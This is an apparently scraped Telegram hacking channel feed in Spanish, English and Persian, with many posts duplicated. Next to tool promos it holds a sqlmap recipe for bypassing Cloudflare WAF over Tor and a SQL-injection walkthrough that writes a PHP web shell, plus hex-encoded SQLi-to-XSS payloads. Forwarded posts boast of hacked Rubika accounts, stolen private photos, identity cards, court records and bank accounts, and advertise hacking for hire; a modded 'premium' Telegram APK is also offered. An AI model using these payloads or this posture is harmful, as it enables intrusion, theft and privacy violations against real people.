Dark-Hydro es una herramienta de OSINT creada en Python con el objetivo de recopilar información sobre un número de teléfono utilizando APIs públicas y técnicas de Google Dorking.
Con Dark-Hydro es pobible obtener:
* Codigo del pais
* Nombre del pais
* Ubicacion del numero de telefono (Ciudad)
* Transportador
* Latitud y Longitud
* Búsquedas de dorking archivos pdf, redes sociales, paginas web, donde el numero telefónico ha sido encontrado
Configuracion
Antes de utilizarlo, es necesario configurar algunas claves API, entre las API:
* Numverify
* Opencage
* Abstract API
* VeriPhone
Una vez obtenida nuestra clave API, es necesario colocar cada una en orden en el archivo config.json de la siguiente forma:
{
“OpencageKey”: “ReemplazarPorApikeyOpencage”,
“Numverifykey”: “ReemplazarPorApikeyNumverify”,
“Abstract”: “ReemplazarPorApikeyAbstract”,
“VeriPhone”: “ReemplazarPorApikeyVeriPhone”
}
https://github.com/Euronymou5/Dark-Hydro
#NULL🖤
https://t.me/Kali_Linux_NULL
Con Dark-Hydro es pobible obtener:
* Codigo del pais
* Nombre del pais
* Ubicacion del numero de telefono (Ciudad)
* Transportador
* Latitud y Longitud
* Búsquedas de dorking archivos pdf, redes sociales, paginas web, donde el numero telefónico ha sido encontrado
Configuracion
Antes de utilizarlo, es necesario configurar algunas claves API, entre las API:
* Numverify
* Opencage
* Abstract API
* VeriPhone
Una vez obtenida nuestra clave API, es necesario colocar cada una en orden en el archivo config.json de la siguiente forma:
{
“OpencageKey”: “ReemplazarPorApikeyOpencage”,
“Numverifykey”: “ReemplazarPorApikeyNumverify”,
“Abstract”: “ReemplazarPorApikeyAbstract”,
“VeriPhone”: “ReemplazarPorApikeyVeriPhone”
}
https://github.com/Euronymou5/Dark-Hydro
#NULL🖤
https://t.me/Kali_Linux_NULL
CHOMTE.SH is a powerful shell script designed to automate reconnaissance tasks during penetration testing. It utilizes various Go-based tools to gather information and identify the attack surface, making it a valuable asset for bug bounty hunters and penetration testers.
https://github.com/mr-rizwan-syed/chomtesh
#NULL🖤
https://t.me/Kali_Linux_NULL
https://github.com/mr-rizwan-syed/chomtesh
#NULL🖤
https://t.me/Kali_Linux_NULL
PassDetective is a command-line tool that scans shell command history to detect mistakenly written passwords, API keys, and secrets. Using regular expressions, it helps prevent accidental exposure of sensitive information in your command history.
https://github.com/aydinnyunus/PassDetective
#NULL🖤
https://t.me/Kali_Linux_NULL
https://github.com/aydinnyunus/PassDetective
#NULL🖤
https://t.me/Kali_Linux_NULL
NULL
Photo
A forensic tool to make analysis of email headers easy to aid in the quick discovery of the attacker.
mailMeta is a python based forensic tool which reads through the email headers from the email file and extracts crucial information to identify if the email is legitimate.
What are the advantages of using mailMeta?
Have you ever heared of email hacking or sophisticated email crimes where a spoofed email is sent to the victim and the victim trusts this email based on the email address which is infact fake. These email contains mallicious links which can be used to extract some information or install some malware or backdoors on your device. So, in order to avoid you from this mailMeta comes to your rescue.
Here I have added instructions on how to download the email from the file and then pass it to the mailMeta executable. It then parses the headers and informs you if the mail is genuine or not. Whenever you are suspicious about an email be sure to check it once here. It can save you in most of the scenarios. If anyone has some ideas/updates feel free to open an issue or create a pull request.
What are the information revealed by the mailMeta? mailMeta parses the following headers:
Message-ID
SPF-Record
DKIM-Record
DMARC-Record
Spoofed Email detection based on the above headers
IP-Address of the sender
Service Provider used for sending the email
Content-Type
Data and Time
https://github.com/gr33nm0nk2802/mailMeta
#NULL🖤
https://t.me/Kali_Linux_NULL
mailMeta is a python based forensic tool which reads through the email headers from the email file and extracts crucial information to identify if the email is legitimate.
What are the advantages of using mailMeta?
Have you ever heared of email hacking or sophisticated email crimes where a spoofed email is sent to the victim and the victim trusts this email based on the email address which is infact fake. These email contains mallicious links which can be used to extract some information or install some malware or backdoors on your device. So, in order to avoid you from this mailMeta comes to your rescue.
Here I have added instructions on how to download the email from the file and then pass it to the mailMeta executable. It then parses the headers and informs you if the mail is genuine or not. Whenever you are suspicious about an email be sure to check it once here. It can save you in most of the scenarios. If anyone has some ideas/updates feel free to open an issue or create a pull request.
What are the information revealed by the mailMeta? mailMeta parses the following headers:
Message-ID
SPF-Record
DKIM-Record
DMARC-Record
Spoofed Email detection based on the above headers
IP-Address of the sender
Service Provider used for sending the email
Content-Type
Data and Time
https://github.com/gr33nm0nk2802/mailMeta
#NULL🖤
https://t.me/Kali_Linux_NULL
GitHub
GitHub - gr33nm0nk2802/mailMeta: An forensics tool to help aid in the investigation of spoofed emails based off the email headers.
An forensics tool to help aid in the investigation of spoofed emails based off the email headers. - gr33nm0nk2802/mailMeta
کد: DAPPS
D: -•• (نقطه خط تیره)
A: •- (خط تیره)
P: •--• (نقطه خط تیره)
P: •--• (نقطه خط تیره)
#NULL🖤
https://t.me/Kali_Linux_NULL
D: -•• (نقطه خط تیره)
A: •- (خط تیره)
P: •--• (نقطه خط تیره)
P: •--• (نقطه خط تیره)
#NULL🖤
https://t.me/Kali_Linux_NULL
Forwarded from زاپاس
🎃رفع فیلتری روبیکا آموزشش فروخته میشود میتونی تو ۴ساعت اکانت روبیکات رفع کنی😱🔰
@Radkor_report
آیدی بنده☝️
https://t.me/Kali_Linux_NULL
https://t.me/Program_writing
@Radkor_report
آیدی بنده☝️
https://t.me/Kali_Linux_NULL
https://t.me/Program_writing
Forwarded from هک شدگان
بسم رب چشای اونی که کنارم نیست🖤
زدن تیمNULL چند اتک کوچیک
Targat1
زدن471قفلی روبیکا🔰
Targat2
هک شدن چند عکس دختر
Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot
Targat3
13شماره هک شده توسط بنده
Targat4
چند شناسنامه های فرد
Shot Shot Shot
Targat5
چند مدارک دادگاهی یه فرد 🐇
Shot Shot Shot Shot Shot Shot Shot
برای درخواست هک پی بنده🎃
@Radkor_report
معاشرت گپ چنلمون🧪
https://t.me/NULL_KALI_LINUX
زدن تیمNULL چند اتک کوچیک
زدن471قفلی روبیکا🔰
Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot
13شماره هک شده توسط بنده
Shot Shot Shot
Shot Shot Shot Shot Shot Shot Shot
برای درخواست هک پی بنده🎃
@Radkor_report
معاشرت گپ چنلمون🧪
https://t.me/NULL_KALI_LINUX
ابزار گرفتن api hash, api id اکانت تلگرام
با این ابزار به سادگی api های اکانتتون رو بگیرید!
اگه براتون ارور اپدیت داد، باید حمایت کنید تا نسخه جدید برای ساخت api رو هم اضافه کنم
بدرود:)
Git: https://github.com/esfelurm/Apis-Telegram
#NULL🖤
https://t.me/Kali_Linux_NULL
با این ابزار به سادگی api های اکانتتون رو بگیرید!
اگه براتون ارور اپدیت داد، باید حمایت کنید تا نسخه جدید برای ساخت api رو هم اضافه کنم
بدرود:)
Git: https://github.com/esfelurm/Apis-Telegram
#NULL🖤
https://t.me/Kali_Linux_NULL
Forwarded from زاپاس
base.apk
4 MB
خب خب اینم یک تلگرام پریوم میتونین ازش استفاده کنین🎃
قابلیت استوری گذاشتن🐇
با شماره مجازی رفتن🫀
تیکه آبی گذاشتن🫁
بدون بن شدن🪼
بدون لگ🐳
قابلیت استوری گذاشتن🐇
با شماره مجازی رفتن🫀
تیکه آبی گذاشتن🫁
بدون بن شدن🪼
بدون لگ🐳
Forwarded from 𝗣𝗮𝗿𝗮𝗻𝗼𝗶𝗮 𝗧𝗕
Please open Telegram to view this post
VIEW IN TELEGRAM
نحوه بای پس WAF با sqlmap
اول از همه، شما باید مطمئن شوید که سایت مورد نظر توسط Cloudflare محافظت می شود، می توانید برای تایید " — ID-waf" را اضافه کنید. با این حال، " — thread=" را بزرگتر از 1 قرار ندهید زیرا هدف به شما خطای "403 Forbidden" می دهد. هنگامی که "خطای 403" را دریافت کردید، آدرس IP شما بلاک می شود. بنابراین، شما باید در نظر داشته باشید که از سرورهای پروکسی یا TOR برای دسترسی به هدف استفاده کنید.
شما باید " — tamper='between,randomcase,space2comment'" و "-v 3" رو اضافه کنید ، در صورتی که هدف محافظت شده توسط Cloudflare تایید شده باشد. همچنین میتوانید در صورت لزوم «--random-agent» و «-tor» را اضافه کنید.
برای استفاده موفقیت آمیز tor ممکن است نیاز به نصب privoxy داشته باشید
#NULL🖤
https://t.me/Kali_Linux_NULL
اول از همه، شما باید مطمئن شوید که سایت مورد نظر توسط Cloudflare محافظت می شود، می توانید برای تایید " — ID-waf" را اضافه کنید. با این حال، " — thread=" را بزرگتر از 1 قرار ندهید زیرا هدف به شما خطای "403 Forbidden" می دهد. هنگامی که "خطای 403" را دریافت کردید، آدرس IP شما بلاک می شود. بنابراین، شما باید در نظر داشته باشید که از سرورهای پروکسی یا TOR برای دسترسی به هدف استفاده کنید.
شما باید " — tamper='between,randomcase,space2comment'" و "-v 3" رو اضافه کنید ، در صورتی که هدف محافظت شده توسط Cloudflare تایید شده باشد. همچنین میتوانید در صورت لزوم «--random-agent» و «-tor» را اضافه کنید.
برای استفاده موفقیت آمیز tor ممکن است نیاز به نصب privoxy داشته باشید
sudo apt install privoxy -yدر نهایت حمله را شروع کنید!
sudo /etc/init.d/privoxy start
python sqlmap.py -u "https://www.target.com/" --identify-waf --tamper="between,randomcase,space2comment" -v 3 --random-agent --tor#Sqlmap
#NULL🖤
https://t.me/Kali_Linux_NULL
اولین کاری که انجام می دهیم این است که بررسی کنیم sql در کجا روی سرور اجرا می شود. این کار با تزریق دستور @@datadir به پرس و جوی sql انجام می شود تا مسیر کامل مکان آن در سرور به دست آید.
مثال:
با فرض اینکه بازتابی را در ستون دوم پیدا کنیم، بار زیر را وارد خواهیم کرد:
C:\xampp\mysql\data\
چگونه SQLI به RCE را اجرا کنیم؟
با توجه به مسیر می توانیم استنباط کنیم که سرور از xampp استفاده می کند و اگر بخواهیم یک فایل ایجاد کنیم و از سرور به آن دسترسی داشته باشیم باید آن را در C:\xampp\htdocs
با توجه به این اطلاعات، در حال حاضر امکان ایجاد پیلود برای شل وجود دارد:
مثال:
و تمام، ما یک شل معکوس در سیستم ایجاد کردیم. اکنون فقط برای دسترسی به آن از خارج (وب) باقی مانده است. و این کار از لینک زیر انجام می شود:
مثال:
با فرض اینکه بازتابی را در ستون دوم پیدا کنیم، بار زیر را وارد خواهیم کرد:
union select 1,@@datadir,3,4 --و خروجی به صورت زیر خواهد بود:
C:\xampp\mysql\data\
چگونه SQLI به RCE را اجرا کنیم؟
با توجه به مسیر می توانیم استنباط کنیم که سرور از xampp استفاده می کند و اگر بخواهیم یک فایل ایجاد کنیم و از سرور به آن دسترسی داشته باشیم باید آن را در C:\xampp\htdocs
با توجه به این اطلاعات، در حال حاضر امکان ایجاد پیلود برای شل وجود دارد:
union select 1,<php_payload>,3,4 into outfile <path> --
مثال:
union select 1,'<?php system($_GET["cmd"]); ?>',3,4 intooutfile 'C:\\xampp\\htdocs\\rce.php' --
و تمام، ما یک شل معکوس در سیستم ایجاد کردیم. اکنون فقط برای دسترسی به آن از خارج (وب) باقی مانده است. و این کار از لینک زیر انجام می شود:
<host>/rce.php?cmd=<command>
برای رسیدن به SiXSS باید مراحل زیر را طی کنیم.
من این روش را خیلی دوست ندارم زیرا خطا را در صفحه وب فلش می کند و در بسیاری از موارد ممکن است کل صفحه را دریافت نکنید، اما فقط یک صفحه خالی با خطا است و اصلا جالب نیست. اما از آنجایی که این یکی از راهها نیز هست، به عنوان مثال یک وبسایت آسیبپذیر را در نظر میگیریم.
exploitable-web.com/link.php?id=1
وقتی یک نقل قول را در انتهای وب سایت قرار می دهیم ممکن است با خطای مشابه مواجه شویم.
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1'' at line 1
خوب این اولین نکته ای است که می توانیم XSS را به وب سایت تزریق کنیم. بنابراین این بار به جای تنها نقل قول، این را تزریق می کنیم:
تزریق پیلود ما:
جمع اوری و ترجمه شده از سایت Sqli to Xss
من این روش را خیلی دوست ندارم زیرا خطا را در صفحه وب فلش می کند و در بسیاری از موارد ممکن است کل صفحه را دریافت نکنید، اما فقط یک صفحه خالی با خطا است و اصلا جالب نیست. اما از آنجایی که این یکی از راهها نیز هست، به عنوان مثال یک وبسایت آسیبپذیر را در نظر میگیریم.
exploitable-web.com/link.php?id=1
وقتی یک نقل قول را در انتهای وب سایت قرار می دهیم ممکن است با خطای مشابه مواجه شویم.
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1'' at line 1
خوب این اولین نکته ای است که می توانیم XSS را به وب سایت تزریق کنیم. بنابراین این بار به جای تنها نقل قول، این را تزریق می کنیم:
' ;<img src=x onerror=prompt(/XSS/)>
تزریق بالا یک کادر محاوره ای را نشان می دهد که XSS می گوید. این یکی حمله اساسی است. حالا بیایید ببینیم چگونه می توانیم XSS را به روشی بهتر تزریق کنیم. تزریق XSS به Query. هنگامی که دریافت Number of Column انجام شد و ما برای Union Query آماده هستیم. فرض کنید 4 ستون داریم، بنابراین کوئری اتحادیه ما به صورت زیر خواهد بود:http://exploitable-web.com/link.php?id=1' union select 1,2,3,4--
فرض کنید ستون 3 به عنوان خروجی در صفحه وب چاپ می شود. بنابراین بار XSS خود را به آن تزریق می کنیم. برای ساده کردن کارها، بار خود را به صورت هگز کدگذاری می کنیم. بار تزریق XSS ما :<img src=x onerror=confirm(/XSS/)>
مقدار کدگذاری شده Hex :0x3c696d67207372633d78206f6e6572726f723d636f6e6669726d282f5853532f293e
تزریق پیلود ما:
http://exploitable-web.com/link.php?id=-1' union select 1,2,0x3c696d67207372633d78206f6e6572726f723d636f6e6669726d282f5853532f293e,4--
لینک XSS ما را به وب سایت خروجی می دهد. این یکی از پیلود های اولیه XSS است، اکنون ما آزاد هستیم تا با استفاده از XSS کارهای دیگری مانند سرقت کوکی، فیشینگ XSS، فیشینگ XSS iFrame، XSS زنجیرهای، ربودن جلسه، حمله CSRF، XssDdos و سایر حملات را انجام دهیم . Forwarded from زاپاس
🎃رفع فیلتری روبیکا آموزشش فروخته میشود میتونی تو ۴ساعت اکانت روبیکات رفع کنی😱🔰
@Radkor_report
آیدی بنده☝️
https://t.me/Kali_Linux_NULL
https://t.me/Program_writing
@Radkor_report
آیدی بنده☝️
https://t.me/Kali_Linux_NULL
https://t.me/Program_writing
Forwarded from ᴛᴀʙ ʟɪꜱᴛ ꜱᴛᴇᴠᴇɴ ᴋɴɪɢʜᴛ
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from هک شدگان
بسم رب چشای اونی که کنارم نیست🖤
زدن تیمNULL چند اتک کوچیک
Targat1
زدن قفلی483تا روبیکا🔰
Targat2
هک شدن چند عکس دختر
Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot
Targat3
13شماره هک شده توسط بنده
Targat4
هک کردن چند شماره حساب بانکی
Targat5
چند شناسنامه های فرد
Shot Shot Shot Shot
Targat6
چند مدارک دادگاهی یه فرد 🐇
Shot Shot Shot Shot Shot Shot Shot Shot Shot
Targat7
هک شدن چند ایمیل
برای درخواست هک پی بنده🎃
@Radkor_report
معاشرت گپ چنلمون🧪
https://t.me/NULL_KALI_LINUX
زدن تیمNULL چند اتک کوچیک
زدن قفلی483تا روبیکا🔰
Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot
13شماره هک شده توسط بنده
هک کردن چند شماره حساب بانکی
Shot Shot Shot Shot
Shot Shot Shot Shot Shot Shot Shot Shot Shot
هک شدن چند ایمیل
برای درخواست هک پی بنده🎃
@Radkor_report
معاشرت گپ چنلمون🧪
https://t.me/NULL_KALI_LINUX